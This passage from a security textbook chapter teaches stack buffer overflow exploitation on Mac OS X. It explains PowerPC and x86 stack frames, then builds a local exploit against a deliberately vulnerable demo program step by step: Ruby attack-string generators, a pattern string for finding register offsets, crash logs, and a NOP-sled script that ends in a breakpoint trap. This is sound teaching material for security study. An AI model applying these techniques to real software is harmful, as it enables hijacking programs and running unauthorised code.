The Mac Hacker's Handbook - Part 3 (final)
Chapter 7 Exploiting Stack Overflows
The stack buffer overflow is the "classic" buffer-overflow vulnerability. This vulnerability class has been known publicly since at least November 1988, when the Robert Morris Internet worm exploited a stack buffer overflow in the BSD finger daemon on VAX machines.
A connection was established to the remote finger service daemon and then a specially constructed string of 536 bytes was passed to the daemon, overflowing its input buffer and overwriting parts of the stack.
—Eugene H. Spafford, "The Internet Worm Program: An Analysis"
Stack buffer overflow attacks and defenses have evolved significantly since then, but the core principles have remained the same: overwrite the function return address, and redirect execution into dynamically injected code, commonly referred to as the shellcode or the exploit payload.
In Leopard, Apple has implemented several defenses against the exploitation of stack buffer overflows, including randomizing portions of the process memory address space, making thread stack segments non-executable on the x86 architecture, and leveraging the GNU C compiler's stack protector in some executables.
This chapter starts with background on how the stack works in Mac OS X, what happens when the stack is "smashed," and how to exploit a simple stack buffer overflow vulnerability. Subsequent sections will detail the stack buffer overflow exploit protections in Leopard and how to overcome them in real-world exploits.
We will start by demonstrating these vulnerabilities with simple attack strings that trigger them. The attack string is the crafted input in an exploit that triggers or exploits a vulnerability. It does not typically include the protocol or syntax elements that may be needed to reach the vulnerability, but it will typically include the injection vector (the elements or aspects of the attack string that are used to obtain control of the target) and the payload (the position-independent machine code that is injected and executed by the target). A complete exploit will include the necessary functionality to trigger the vulnerability, the injection vector to take full control, the payload to be executed by the target, and local payload handlers to implement attacker-side functionality. In most of this chapter and the next we will demonstrate various injection vectors using simplified payloads that avoid adding unnecessary complications at this early stage. In later chapters we will discuss how to build full shellcode and other more complicated exploit payloads, as well as topics like payload encoders and application-specific attacks.
Stack Basics
To understand how a stack buffer overflow works, it is important first to understand what the stack is and how it is used under normal circumstances. The stack is a special region of memory that is used to support calling subroutines (typically called functions in source-code form). The stack is used to keep track of subroutine parameters, local variables, and where to resume execution after the subroutine has completed. On most computer architectures, including all of the architectures supported by Mac OS X, the stack automatically grows downward toward lower memory addresses.
Stack memory is divided into successive frames: each time a subroutine is called, even a recursive one that calls itself, it allocates a fresh stack frame. The current bottom of the stack is pointed to by a special register used as the stack pointer, and the top of the current stack frame is usually pointed to by another special register used as the frame pointer. Values are typically written to or read from the stack, and the stack pointer is then adjusted to point to the new bottom of the stack. Writing new values to the stack is referred to as pushing, and reading values from it as popping.
Exactly how the stack is used depends on the calling conventions specific to the architecture for which the program binary was compiled. The calling conventions define how subroutines are called and what actions are taken in the subroutine's prolog and epilog, the code inserted by the compiler before and after the function body, respectively. The stack may be used to store subroutine parameters, linkage, saved registers, and local variables, but some architectures may use registers for some of these purposes. The stack is used most extensively on x86, where there are relatively few general-purpose registers; on PowerPC, where there are more general-purpose registers available, registers are used for subroutine parameters and linkage. In this chapter we will focus on the exploitation of stack buffer overflows on the 32-bit PowerPC and x86 architectures. While Leopard also supports 64-bit PowerPC and x86-64 binaries, very few security-sensitive applications are compiled for the 64-bit architectures. Therefore we will only focus on the 32-bit architectures in this book.
Stack Usage on PowerPC
The PowerPC calling convention places subroutine parameters in registers where possible for higher performance. Register-sized parameters are placed in registers r3 through r10, but space is still reserved on the stack for them in case the called function needs to use those registers for another purpose. Any arguments larger than the register size are pushed onto the stack.
One notable difference between the PowerPC architectures and the x86 architectures is that the PowerPC uses a dedicated link register (lr) instead of the stack to store the return address when a subroutine is called. To support subroutines calling other subroutines, the value of that register must be saved to the stack. In effect, this means stack buffer overflows are still exploitable; they only obtain control a little later, after the restored (and overwritten) link register is actually used.
The subroutine prolog, shown below, allocates itself a stack frame by decrementing the stack pointer, saving the old values of the stack pointer and link register to the stack, and finally saving the values of any nonvolatile registers that get clobbered by the subroutine.
00001f64 mfspr r0,lr ; Obtain value of link register
...
The subroutine epilog, shown below, reverses this process by restoring nonvolatile registers, restoring the link register and stack pointer, and finally branching to the link register to return from the subroutine.
00001f88
00001f8c
00001f90
00001f94
..
Return from subroutine
The PowerPC stack usage conventions also define the area below the stack pointer as the red zone, a scratch storage area that the subroutine may use temporarily knowing that it will be overwritten when it calls another subroutine. Figure 7-1 shows the layout of a PowerPC stack frame, including the red zone scratch space.
[Figure 7-1: layout of a PowerPC stack frame, including the red zone]
Stack Usage on x86
Since there are few general-purpose registers on x86, the stack is used quite extensively. We will cover the basic concepts here, but for a comprehensive treatment of how the stack is used on x86, consult The Art of Assembly Language (No Starch, 2003). There are several calling conventions possible on the x86 architecture, but Mac OS X uses a single calling convention on x86, which is what we will describe here. When a subroutine is called, the caller pushes the parameters on the stack and executes the call instruction, which pushes the address of the next instruction onto the stack and transfers control to the subroutine. The function prolog pushes the caller's frame pointer onto the stack, moves the stack pointer value to use as its own frame pointer, pushes clobbered registers to the stack, and finally allocates space for its own local variables by subtracting their total size from the stack pointer. A simple function prolog is shown below.
1fc6: push ebp
1fc7: mov ebp,esp
1fc9: sub esp,0x418
The called subroutine must save the values of the following registers and restore them before returning if it changes (clobbers) them: EBX, EBP, ESI, EDI, and ESP. The function epilog reverses this process by issuing the leave instruction, which restores ESP from EBP and pops the saved frame pointer back into EBP, and then issuing the ret instruction to jump to the return address stored on the stack.
1fe4: leave
1fe5: ret
Figure 7-2 shows the layout of an x86 stack frame.
[Figure 7-2: layout of an x86 stack frame]
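To make the prolog and epilog concrete, the following Ruby sketch replays the x86 sequence above on a toy stack. It is only an illustration: the ToyCPU class, the starting register values, the call target, and the model of memory as a hash of 4-byte slots are all assumptions made for this example and do not come from the original listing.

```ruby
# Toy model of the x86 call/prolog/epilog sequence. Memory is a Hash of
# 4-byte slots keyed by address; every name and address is illustrative.
class ToyCPU
  attr_accessor :esp, :ebp, :eip
  attr_reader :mem

  def initialize(esp, ebp)
    @esp, @ebp, @eip = esp, ebp, 0
    @mem = {}
  end

  def push(value)          # the stack grows toward lower addresses
    @esp -= 4
    @mem[@esp] = value
  end

  def pop
    value = @mem[@esp]
    @esp += 4
    value
  end

  def call(target, return_address)
    push(return_address)   # call pushes the address of the next instruction
    @eip = target
  end

  def prolog(locals_size)
    push(@ebp)             # push ebp
    @ebp = @esp            # mov ebp, esp
    @esp -= locals_size    # sub esp, locals_size
  end

  def epilog
    @esp = @ebp            # leave: mov esp, ebp
    @ebp = pop             #        pop ebp
    @eip = pop             # ret: pop the return address into eip
  end
end

cpu = ToyCPU.new(0xbffff000, 0xbffff100)
cpu.call(0x1fc6, 0x2010)
cpu.prolog(0x418)

# An unchecked copy that runs past the locals reaches the saved frame
# pointer (at ebp) and then the return address (at ebp + 4).
cpu.mem[cpu.ebp]     = 0x41414141
cpu.mem[cpu.ebp + 4] = 0x42424242
cpu.epilog
puts format("ebp=0x%08x eip=0x%08x esp=0x%08x", cpu.ebp, cpu.eip, cpu.esp)
```

In this model the epilog faithfully restores whatever sits in the two slots above the locals, so once those slots hold attacker-chosen values, ret transfers control to the attacker's address.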
Smashing the Stack on PowerPC
You now know how a correctly running program uses the stack. What is more interesting, however, is what happens when things go wrong, and especially what happens when an attacker intentionally makes things go wrong. For the first example, we will demonstrate how to exploit a simple, local stack buffer overflow on PowerPC, intentionally ignoring Leopard's Library Randomization for the moment. Leopard's Library Randomization changes the load addresses of system frameworks and libraries when system libraries or default applications are changed. Since this only happens periodically, it does not affect the exploitation of local vulnerabilities.
Our first example will examine a trivially simple program with a stack buffer overflow vulnerability.
[Source code listing]
We will show you how to develop an exploit for this vulnerability incrementally by creating the attack string with one-line Ruby scripts and examining the results in ReportCrash logs and GDB. (Ruby is an open-source, object-oriented scripting language installed by default on Mac OS X and available at http://www.ruby-lang.org.) On Leopard, ReportCrash replaces the CrashReporter daemon present in older releases of Mac OS X, but it still stores its logs in ~/Library/Logs/CrashReporter and /Library/Logs/CrashReporter for legacy compatibility. Where possible, we will try to use only the ReportCrash output, since running a process in the debugger may change several aspects of its execution. For example, the values of the stack pointer will be different because GDB and the dynamic linker (dyld) communicate through some special environment variables that are not present when the program is not running under GDB, adding more space to the environment variables stored on the stack.
If you run this program with an overly long first argument consisting of all ASCII 'A' characters, it will crash after it tries to return from the smashmystack() function. You can do this with a simple Ruby one-liner that prints a string of 2000 ASCII 'A' characters, as shown below.
% ./smashmystack.ppc `ruby -e 'puts "A" * 2000'`
Segmentation fault
Examining the ReportCrash log reveals the following:
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000041414140
Crashed Thread: 0
Thread 0 Crashed:
0 ??? 0x41414140 0 + 1094795584
Thread 0 crashed with PPC Thread State 32:
srr0: 0x41414140 srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
r0: 0x41414141 r1: 0xbfffe9b0 r2: 0x00000001 r3: 0xbfffe598
...
You can easily spot which registers you control: look for registers with the value 0x41414141, the hexadecimal encoding of the ASCII string "AAAA". The attack string has clearly corrupted the r0, r30, r31, and lr registers. The most important register to control is the link register lr, since it contains the address where execution will resume when the subroutine returns using the blr instruction. Since you can control the lr register, you can control the execution of the target program.
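Scanning a thread-state dump for the marker value can also be automated. The sketch below is a hypothetical helper (the name controlled_registers and the regular expression are assumptions for illustration, not part of ReportCrash or any tool); the sample text is the portion of the thread state quoted above. It compares values with the low two bits masked off, because srr0 reports 0x41414140 rather than 0x41414141: PowerPC instructions are word-aligned, so the low two bits of a branch target are ignored.

```ruby
# Find registers holding (or derived from) a marker value in a ReportCrash
# thread-state dump. The helper name and matching rule are illustrative.
MARKER = 0x41414141  # "AAAA"

def controlled_registers(thread_state, marker = MARKER)
  thread_state.scan(/(\w+):\s+0x([0-9a-fA-F]+)/).select do |_name, hex|
    # Compare without the low two bits so the word-aligned program
    # counter (srr0) also matches. This is a deliberately loose match.
    (hex.to_i(16) & ~3) == (marker & ~3)
  end.map { |name, _hex| name }
end

sample = <<~LOG
  srr0: 0x41414140 srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
  r0: 0x41414141 r1: 0xbfffe9b0 r2: 0x00000001 r3: 0xbfffe598
LOG

puts controlled_registers(sample).inspect
```

Run against a complete thread-state listing, the same helper would also report any other registers loaded from the attack string.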
In order to place chosen values in controlled registers, you will first need to identify the locations in the attack string that correspond to the overwritten values of each controlled register. This can be done using a specially patterned string that will let you quickly calculate the position in the pattern string based on the register's value. The pattern consists of every ASCII character from 'A' to 'z', each repeated four times. To find the offset in the pattern string from which the register's value is taken, subtract 0x41 (the hexadecimal ASCII value for 'A') from the repeated hexadecimal byte value in the register, convert to decimal, and multiply by 4. For example, if a register's value is 0x58585858, then it is (0x58 - 0x41) x 4 = 0x17 x 4 = 23 x 4 = 92 bytes from the beginning of the pattern string. The pattern string is generated by the following Ruby code.
pattern = (('A'..'Z').to_a + ['[', '\\', ']', '^', '_', '`'] +
('a'..'z').to_a).inject("") {|s, c| s += c.to_s * 4}
In the following examples, you can assume that this variable is already defined (for brevity). Metasploit uses a similar pattern string, but the string used here is better for determining proper alignment and is somewhat easier to spot in register-value dumps, at the expense of some flexibility.
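The offset arithmetic described above can be wrapped in a small helper. This is a minimal sketch: pattern_offset is a hypothetical name introduced here, and the pattern is rebuilt inside the snippet only so that it runs on its own.

```ruby
# Rebuild the pattern string so this snippet is self-contained.
chars = ('A'..'Z').to_a + ['[', '\\', ']', '^', '_', '`'] + ('a'..'z').to_a
pattern = chars.inject("") { |s, c| s + c * 4 }

# Hypothetical helper: map a register value such as 0x58585858 to its
# offset in the pattern. Returns nil if the four bytes are not identical,
# which usually means the value was not taken from an aligned position.
def pattern_offset(value)
  bytes = [value].pack('N').bytes
  return nil unless bytes.uniq.size == 1 && bytes[0].between?(0x41, 0x7a)
  (bytes[0] - 0x41) * 4
end

offset = pattern_offset(0x58585858)
puts offset               # 92
puts pattern[offset, 4]   # XXXX
```

Reading the four bytes back from the pattern at the computed offset is a quick sanity check that the register value really came from that position.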
Now we will demonstrate how you can use the pattern string to identify the offsets into your attack string where the controlled registers get their values. You know that the stack buffer is 1,024 bytes long, so now you should run smashmystack.ppc with an argument generated by
arg0 = "Z" * 1024 + pattern
This produces the following crash dump in the ReportCrash log:
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000049494948
Crashed Thread: 0
Thread 0 Crashed:
0 ??? 0x49494948 0 + 1229539656
Thread 0 crashed with PPC Thread State 32:
srr0: 0x49494948 srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
r0: 0x49494949 r1: 0xbfffef50 r2: 0x00000001 r3: 0xbfffeb38
The offsets in the pattern string for the controlled registers are as follows:
■ r30 = 16 bytes
■ r31 = 20 bytes
■ r0, lr = 32 bytes
This means our attack string will have the following format:
[ 1040 bytes space ] [ r30 ] [ r31 ] [ 8 bytes space ] [ lr ]
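The layout follows directly from the measured offsets: each register's position is the 1,024-byte buffer length plus its offset into the pattern. The sketch below derives the same format programmatically; build_attack_string, the constant names, and the placeholder register values are assumptions made for illustration.

```ruby
# Derive the attack-string layout from the offsets measured above.
# Field names and the filler byte are illustrative choices.
BUFFER_SIZE = 1024
OFFSETS = { r30: 16, r31: 20, lr: 32 }  # offsets into the pattern string

def build_attack_string(values, filler = "Z")
  out = filler * BUFFER_SIZE
  OFFSETS.sort_by { |_reg, off| off }.each do |reg, off|
    position = BUFFER_SIZE + off
    out << filler * (position - out.length)  # pad up to the field
    out << values.fetch(reg)                 # 4-byte value for this register
  end
  out
end

attack = build_attack_string({ r30: "AAAA", r31: "BBBB", lr: "CCCC" })
puts attack.length          # 1060
puts attack.index("AAAA")   # 1040
puts attack.index("CCCC")   # 1056
```

The 8 bytes of filler between r31 and lr fall out of the gap between offsets 24 and 32.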
Recall from the PowerPC subroutine epilog earlier in this chapter that the value for the link register is loaded from 8 bytes past the stack pointer. In this example, we will hard-code the stack memory address of our payload in our attack string at the offset for the overwritten link register (lr). The chosen value for the link register must be 12 bytes greater than the value of the stack pointer, so that the target program will return to and execute the bytes from the attack string immediately following the value for lr. This is the location in the attack string where you should place your shellcode or other payload.
For an initial payload, you can simply use a single breakpoint trap instruction. This will allow you to verify that you are executing your exploit payload without having to worry about the payload failing for any other reason. You can also use a variation of this to figure out how much space you have available for your payload in the attack string. If you test the exploit with a payload of many no-operation (or NOP) instructions with a single breakpoint trap instruction at the end and the exploit causes the program to crash with a breakpoint exception, you know the entire payload was executed. A sequence of repeated NOP instructions is usually referred to as a NOP slide or NOP sled.
At this point, the attack string is complex enough that it makes sense to put it together in a complete script rather than regenerating it on the command line each time. The following Ruby script shows how to programmatically generate the attack string for this simple exploit.
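#!/usr/bin/env ruby
# Instruction words packed as 32-bit big-endian values ('N')
NOP = [0x30800114].pack('N')
TRAP = [0x7c852808].pack('N')
# Recognizable values for the other overwritten registers
r30 = "AAAA"
r31 = "BBBB"
# Placeholder link register value; replace once r1 is known from the crash log
lr = [0xdeadbeef].pack('N')
# NOP sled followed by a single breakpoint trap
payload = NOP * 256 + TRAP
puts "Z" * 1040 + r30 + r31 + "Z" * 8 + lr + payload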
The first time that you run this exploit, you should use a special invalid value for the link register (the script above uses 0xdeadbeef). This will allow you to run the exploit once, record the value of the stack pointer from the ReportCrash thread state listing, and use that to calculate the correct value for the link register. Recall that the payload in your attack string will start 12 bytes after the value of the stack pointer when the target program branches to the link register.
% ./smashmystack.ppc `./exp.rb`
Segmentation fault
The ReportCrash log looks like the following:
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x00000000deadbeec
Crashed Thread: 0
Thread 0 Crashed:
0 ??? 0xdeadbeec 0 + 3735928556
Thread 0 crashed with PPC Thread State 32:
srr0: 0xdeadbeec srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
r0: 0xdeadbeef r1: 0xbfffe8d0 r2: 0x00000001 r3: 0xbfffe4b8
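With the stack pointer from this log, the link register value can be worked out using the 12-byte relationship stated earlier. The snippet below is a small sketch of that arithmetic; it assumes the stack pointer will be the same on the next run, which in turn assumes that the attack string length and the process environment stay unchanged.

```ruby
# Compute the link register value from the stack pointer (r1) reported in
# the crash log, using the 12-byte relationship stated in the text.
r1 = 0xbfffe8d0            # r1 from the thread state listing
lr_value = r1 + 12
lr = [lr_value].pack('N')  # 32-bit big-endian, matching the script's pack('N')

puts format("0x%08x", lr_value)   # 0xbfffe8dc
puts lr.unpack1('H*')             # bfffe8dc
```

The resulting four bytes would replace the 0xdeadbeef placeholder in the script.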
© Copyright 2009 by Wiley Publishing, Inc., Indianapolis, Indiana.
